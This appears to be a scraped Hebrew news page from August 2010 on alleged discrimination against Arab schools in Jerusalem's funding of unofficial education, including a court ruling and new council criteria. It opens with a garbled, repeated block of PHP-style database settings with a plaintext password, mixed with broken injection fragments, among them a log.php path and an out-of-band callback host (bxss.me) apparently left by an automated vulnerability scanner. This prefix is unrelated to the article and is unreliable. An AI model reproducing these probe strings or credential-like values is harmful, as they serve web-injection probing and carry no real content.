$db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "1ySf9n9nO"; ?> $db_host = "1" $db_host = "1"; $db_user = "pHqghUme"; $db_pass = "g00dPa$$w0rD"; $db_name = "19342244"; ?> ?>acker-9434/log.php?"; ?>{acx}}%>"; ?> $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> $db_name = "1"; ?>b_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?>>'hitvtgywpoinqc09d0.bxss.me')")"; $db_pass = "g00dPa$$w0rD"; $db_name = "1"; ?> ?> עיריית ירושלים מפלה מוסדות חינוך ערביים לעומת חרדים במתן תקציבים
x

דיווח על תקלה

תאור תקלה:
שם:
דואר אלקטרוני:
חיפוש באתר
מאמרים אחרונים

מוסדות החינוך הערביים בירושלים מופלים לרעה לעומת החרדים

תאריך: 26/08/2010 16:26   מחבר: מערכת האתר

חוק נהרי

בשנת 2007 התקבל בכנסת חוק חינוך ממלכתי המכונה "חוק נהרי" על שם מגיש הצעת החוק, השר משולם נהרי, כתוארו אז. לפי החוק, רשויות ועיריות ישתתפו בתקצוב הוצאות מנהלה של מוסדות חינוך פרטיים שהוקמו על ידי עמותות חרדיות וקבוצות הורים, המכונים "מוכר שאינו רשמי".

לפי החוק יקבלו מוסדות אלו סבסוד מכספי הרשויות בשיעור 75% ממה שמקבלים המוסדות הרשמיים הממלכתיים ורשויות שירצו בכך יוכלו לסבסד את הוצאות אותם מוסדות לא רשמיים בשיעור של 100%. חרף קבלת החוק לא אושרה וניתנה תוספת תקציבית לתקציב החינוך של הרשויות. כך יוצא, שהרשויות תאלצנה לממן מתקציב ממלכתי נתון את החינוך הבלתי רשמי.

יישום החוק בירושלים

ההרכב הדמוגרפי בירושלים, מוצא גם את ייצוגו בהתאמה במועצת העיר. לחרדים יש נוכחות פוליטית. נציגם כבר כיהן כראש העיר. כוח המיקוח שלהם עולה עם הגידול במספר הנציגים. הם יודעים להילחם למען האינטרסים של שולחיהם לפעילות ציבורית. הם לא מסתפקים בדיבורים והצהרות נבובות. הכסף מדבר. זה מה שקובע. בדרכם לאישור הגידול בתקציב התמיכות למוסדות החינוך המיוחד שלהם, הם עלולים לדרוך על נזקקים אחרים, שנותרים עם פירורי תקציב במקרה הטוב. כאלו יכולים להיות, מוסדות החינוך הלא רשמיים במגזר הערבי.

והנה, במהלך שנת הלימודים הקודמת העבירה מועצת ירושלים החלטה מעוררת מחלוקת בתוך המועצה ומחוצה לה. לפי ההחלטה שהתקבלה, מוסדות חינוך מוכרים שאינם רשמיים יהנו מסבסוד מלא של העירייה לעומת סבסוד בשיעור של 75% שהיה תקף עד אז.

התנגדות ועתירה לבית המשפט

כדי להוסיף תקציב צריך להגדיר קריטריונים חדשים שיש בהם להצדיק תוספת תקציב. "המרכז לפלורליזם יהודי", זיהה את אי השוויון לטעמו בעצם הגדרת הקריטריונים המפלים לטובה את המוסדות החרדיים על חשבון מוסדות חינוך ערביים. בתגובה, הוגשה תביעה לבית המשפט לשינוי החלטת המועצה.

לפי המתפרסם בעיתונות, מועצת העירייה לא שיתפה את היועץ המשפטי שלה, עו"ד יוסף חביליו בניסוח ובחירת הקריטריונים החדשים שבגינם יהנו מוסדות החינוך הלא רשמיים מסבסוד מלא של העירייה. עו"ד חביליו פירסם שנה קודם את חוות דעתו שהקריטריונים הקיימים אינם שוויוניים. ראש העיר ניר ברקת לפי הנטען התעלם מחוות הדעת והזמין חוות דעת נגדית של יועץ חיצוני.  היועץ המשפטי לממשלה, העדיף את עמדת חביליו והמרכז לפלורליזם יהודי והצטרף לעתירתו.

קבלת העתירה וביטול החלטת העירייה

השופט נועם סולברג שדן בעתירה קבע בחודש אפריל 2010 :" זו החלטה שאיננה שוויונית, היא נוגדת את הדין המנהלי וחורגת חריגה קשה מן המנהל התקין המחייב חלוקת תקציבים בהתאם לתבחינים ענייניים ...בנסיבות אלו אין מנוס מביטולן של החלטות כמבוקש בעתירה". עוד נקבע על ידי השופט, " על מועצת עירית ירושלים לקבוע תבחינים חדשים ומפורטים להפעלת שיקול דעת לחלוקת התקציב הנוסף למוסדות מוכרים שאינם רשמיים".

העירייה מתחכמת לפסק הדין

יש החלטה שיפוטית שמורה לעירייה כיצד לפעול. אז מה. בעירייה החליטו להכשיר את ההחלטה הקודמת למימון מלא של מוסדות החינוך המדוברים על ידי שינוי נוסף של הקריטריונים כך שיעדיפו את המוסדות החרדיים על חשבון הערביים. האתר Ynet מדווח כי ביום 26.08.10 מתכנסת מועצת העירייה לאשר קריטריונים חדשים למתן סבסוד מלא.

אחד הקריטריונים המרכזיים שהובאו לאישור הוא: רק מוסדות המפעילים לכל הפחות 7 מוסדות חינוך , ייהנו מקבלת ההטבה הממומנת על ידי העירייה. קריטריון זה לבדו מוציא את מרבית מוסדות החינוך מרשימת מקבלי ההטבה. שהרי, רק רשת חינוך אחת במזרח ירושלים "סכנין", המפעילה 11 מוסדות זכאית להטבה, לעומת 40 מוסדות במזרח העיר שלא עומדים בקריטריון ומן הסתם לא ייהנו מההטבה.

ראשי המגזר החרדי בעיר יכולים להיות רגועים. הם עונים על הקריטריונים המספריים שהועלו להחלטת העירייה. בין המוסדות שיהנו נמנים: "מעיין החינוך התורני" של ש"ס ו"המרכז לחינוך עצמאי" של אגודת ישראל. התלמידים במוסדות אלה מהווים לפחות כ – 40% מכלל התלמידים בחינוך המוכר שאינו רשמי בירושלים.

מהעירייה נמסר בתגובה ל Ynet כי הטענות חסרות שחר. לא יחול שינוי במגזר החרדי. השינוי היחיד הוא הוספת תקצוב לרשת חינוך ערבית שלא תוקצבה עד כה. נמתין ונדווח על התוצאות.